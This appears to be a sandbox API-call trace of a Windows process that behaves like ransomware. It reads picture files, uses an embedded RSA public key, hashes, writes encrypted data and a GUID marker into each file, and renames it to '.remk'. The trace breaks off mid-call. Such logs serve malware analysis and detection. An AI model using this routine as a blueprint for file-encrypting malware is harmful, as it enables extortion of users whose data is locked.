SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0232.864] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xfc08, lpOverlapped=0x0) returned 1 [0232.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0232.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.865] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0232.866] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0232.866] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0232.866] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0232.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0232.866] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0232.866] GetLastError () returned 0x0 [0232.866] CryptDestroyHash (hHash=0x31de170) returned 1 [0232.866] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0232.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0232.866] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0232.866] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0232.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.866] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0232.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xfc10) returned 0x37c2278 [0232.867] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0232.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0232.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0232.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0232.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0232.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c2208 [0232.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee268 [0232.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb420 [0232.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee280 [0232.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2b0 [0232.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee310 [0232.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2c8 [0232.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0232.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0232.867] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0232.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0232.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2b0 | out: hHeap=0x630000) returned 1 [0232.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2c8 | out: hHeap=0x630000) returned 1 [0232.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee310 | out: hHeap=0x630000) returned 1 [0232.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0232.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee310 [0232.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0232.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee2c8 [0232.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0232.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee2b0 [0232.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0232.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0232.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0232.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0232.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0232.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0232.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2c8 | out: hHeap=0x630000) returned 1 [0232.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0232.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2b0 | out: hHeap=0x630000) returned 1 [0232.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0232.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee310 | out: hHeap=0x630000) returned 1 [0232.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0232.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0232.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0232.868] GetCurrentThreadId () returned 0x314 [0232.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0232.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37b9590 [0232.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0232.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0232.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0232.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0232.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0232.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0232.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.869] GetCurrentThreadId () returned 0x314 [0232.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0232.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0232.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0232.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0232.870] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xfc08, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.870] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0232.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.870] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0232.870] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0232.870] CloseHandle (hObject=0x640) returned 1 [0232.875] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uNclF6hauoNOJdN8.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\unclf6hauonojdn8.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uNclF6hauoNOJdN8.png.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\unclf6hauonojdn8.png.remk")) returned 1 [0232.876] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.876] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.876] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.878] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0232.878] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ac4d1a0, ftCreationTime.dwHighDateTime=0x1d5de1b, ftLastAccessTime.dwLowDateTime=0xf9b53c90, ftLastAccessTime.dwHighDateTime=0x1d5da54, ftLastWriteTime.dwLowDateTime=0xf9b53c90, ftLastWriteTime.dwHighDateTime=0x1d5da54, nFileSizeHigh=0x0, nFileSizeLow=0x10d8f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YyKbPUy.jpg", cAlternateFileName="")) returned 1 [0232.878] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YyKbPUy.jpg") returned=".jpg" [0232.878] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YyKbPUy.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yykbpuy.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0232.879] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=69007) returned 1 [0232.879] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0232.882] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x10d69, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.882] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0232.884] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x10d8f, lpOverlapped=0x0) returned 1 [0232.885] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.885] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.885] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.885] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0232.886] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0232.887] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0232.887] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0232.887] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0232.887] GetLastError () returned 0x0 [0232.887] CryptDestroyHash (hHash=0x31de170) returned 1 [0232.887] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0232.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0232.887] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0232.887] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0232.887] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0232.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.888] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0232.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0232.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2c8 | out: hHeap=0x630000) returned 1 [0232.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2e0 | out: hHeap=0x630000) returned 1 [0232.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee328 | out: hHeap=0x630000) returned 1 [0232.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0232.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee328 [0232.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0232.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee2e0 [0232.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0232.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee2c8 [0232.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0232.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0232.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0232.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0232.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0232.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0232.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0232.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2e0 | out: hHeap=0x630000) returned 1 [0232.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0232.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2c8 | out: hHeap=0x630000) returned 1 [0232.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0232.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee328 | out: hHeap=0x630000) returned 1 [0232.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0232.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0232.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0232.889] GetCurrentThreadId () returned 0x314 [0232.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0232.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37b9620 [0232.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0232.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0232.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0232.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0232.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0232.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.890] GetCurrentThreadId () returned 0x314 [0232.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0232.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0232.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0232.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0232.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0232.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0232.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee328 [0232.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0232.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0232.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0232.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0232.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0232.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0232.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0232.891] RtlAllocateHeap (HeapHandle=0x630000, 